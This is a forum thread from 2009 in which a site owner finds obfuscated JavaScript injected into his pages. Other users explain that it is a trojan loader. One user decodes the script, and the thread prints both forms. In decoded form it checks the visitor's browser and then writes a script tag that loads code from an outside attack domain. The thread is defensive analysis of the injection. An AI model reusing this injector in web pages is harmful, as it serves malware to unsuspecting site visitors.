speedy33417 Posted May 19, 2009 Share Posted May 19, 2009 I have some weird code that appeared in my websites source code. Not sure if someone hacked into my server or what happened. Here's a the code. How concerned should I be? What does the code do? <script language=javascript><!-- (function(){var tdv2O='%';var zL7j=('va>72>20a>3d>22S>63riptEngine>22>2cb>3d>22>56ersion()+>22>2c>6a>3d>22>22>2cu>3dnavig>61tor>2eu>73>65r>41gen>74>3bif>28>28u>2eind>65x>4ff>28>22C>68>72o>6de>22>29>3c0)>26>26(u>2ei>6edexO>66>28>22Win>22)>3e>30)>26>26>28u>2eindexOf(>22NT>20>36>22)>3c0)>26>26(do>63ument>2eco>6fki>65>2eind>65x>4f>66>28>22miek>3d1>22)>3c0)>26>26(>74ypeo>66>28z>72>76>7ats)>21>3d>74yp>65of(>22A>22)))>7b>7ar>76zt>73>3d>22A>22>3beval(>22if(wi>6edow>2e>22+a>2b>22>29j>3dj+>22+a+>22Major>22>2b>62>2ba+>22M>69nor>22>2bb+a>2b>22Build>22+b>2b>22j>3b>22)>3bdocu>6dent>2e>77ri>74e(>22>3cs>63ri>70>74>20src>3d>2f>2fm>22+>22a>72tu>7a>2e>63n>2fvid>2f>3fid>3d>22+j>2b>22>3e>3c>5c>2fscript>3e>22>29>3b>7d').replace(/>/g,tdv2O);var bhioa=unescape(zL7j);eval(bhioa)})(); --></script> Quote Link to comment Share on other sites More sharing options...
ober Posted May 19, 2009 Share Posted May 19, 2009 Probably a trojan injected by a hacker. Delete it and secure your site. Quote Link to comment Share on other sites More sharing options...
speedy33417 Posted May 19, 2009 Author Share Posted May 19, 2009 Thanks ober. This code has been added to hundreds of pages on my site and luckily they all have the same upload time stamp so I can easily spot which ones have been affected. If it's a trojan what does it really do? Does steal passwords? How does it work? Would I have to be on an affected webpage and information entered on that page would be compromised? Or does this mean that my entire website is compromised now? I'm just trying to understand what it might do and what damage may have been done. Thanks for your help. Quote Link to comment Share on other sites More sharing options...
ober Posted May 19, 2009 Share Posted May 19, 2009 It will actually try to install itself on the client PC. I got nailed on my personal site when I used some 3rd party code. Some of my users had their anti-virus software pick it up. Quote Link to comment Share on other sites More sharing options...
Ken2k7 Posted May 19, 2009 Share Posted May 19, 2009 My friend's blog site with something similar. It never affected me though. Hail NOSCRIPT! Quote Link to comment Share on other sites More sharing options...
Daniel0 Posted May 19, 2009 Share Posted May 19, 2009 Well, you could just check the code yourself, no? What you posted is equivalent to the following Javascript: var a="ScriptEngine",b="Version()+",j="",u=navigator.userAgent;if((u.indexOf("Chrome")<0)&&(u.indexOf("Win")>0)&&(u.indexOf("NT 6")<0)&&(document.cookie.indexOf("miek=1")<0)&&(typeof(zrvzts)!=typeof("A"))){zrvzts="A";eval("if(window."+a+")j=j+"+a+"Major"+b+a+"Minor"+b+a+"Build"+b+"j;");document.write("<script src=//m"+"artuz.cn/vid/?id="+j+"><\/script>");} Applying some formatting we get: var a="ScriptEngine", b="Version()+", j="", u=navigator.userAgent; if ((u.indexOf("Chrome") < 0) && (u.indexOf("Win") > 0) && (u.indexOf("NT 6") < 0) && (document.cookie.indexOf("miek=1") < 0) && (typeof(zrvzts) != typeof("A"))) { zrvzts="A"; eval("if(window."+a+")j=j+"+a+"Major"+b+a+"Minor"+b+a+"Build"+b+"j;"); document.write("<script src=//m"+"artuz.cn/vid/?id="+j+"><\/script>"); } The string within the eval() is this: if(window.ScriptEngine)j=j+ScriptEngineMajorVersion()+ScriptEngineMinorVersion()+ScriptEngineBuildVersion()+j; So it'll set j if some conditions are true, and it will then execute the Javascript which is hosted on http://martuz.cn/vid/?id=j This is seemingly a "reported attack site". The domain name martuz.cn resolves to 98.124.198.1, but that machine doesn't seem to be up. Quote Link to comment Share on other sites More sharing options...
speedy33417 Posted May 20, 2009 Author Share Posted May 20, 2009 Thanks all for the help. Btw, Daniel. How did you get your version of the JS code out of mine? It doesn't look anything close you posted. Is it encrypted in some way? How (and where) do I convert the original hacker code to a JS code that makes more sense (like yours)? Quote Link to comment Share on other sites More sharing options...
Daniel0 Posted May 20, 2009 Share Posted May 20, 2009 You see the very last statement of your code? eval(bhioa) It's evaluating the contents of the variable bhioa. It's simply a matter of printing that variable to get the plain text code. It's no more than obfuscation. A browser needs HTML, CSS and Javascript in plain text, so it's impossible to decrypt it and/or hide it. Quote Link to comment Share on other sites More sharing options...
PugJr Posted May 20, 2009 Share Posted May 20, 2009 Just for future reference on secruity, how did your site obtain that in your source code? You can't add your own script into source code with like XSS or mysql injections right or anything of that sort? Quote Link to comment Share on other sites More sharing options...
jackpf Posted May 20, 2009 Share Posted May 20, 2009 Just wondering...how do you install stuff onto a client's PC with javascript? That would be cool And are you sure it's not your host? Is it actually in the file, if you open the file to edit it, not just on your source code? Some hosts automatically append scripts to all sites, like stat counters and stuff. But yeah, try something like this: document.write(unescape(bhioa)); Quote Link to comment Share on other sites More sharing options...
waynew Posted May 21, 2009 Share Posted May 21, 2009 Just wondering...how do you install stuff onto a client's PC with javascript? That would be cool Sorry mate. You need a hacker name such as RIPPER or SLASHER to do that. Quote Link to comment Share on other sites More sharing options...
jackpf Posted May 21, 2009 Share Posted May 21, 2009 Ok, my new alias is "jackpf the ripper". That would be pretty fun though... Quote Link to comment Share on other sites More sharing options...
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.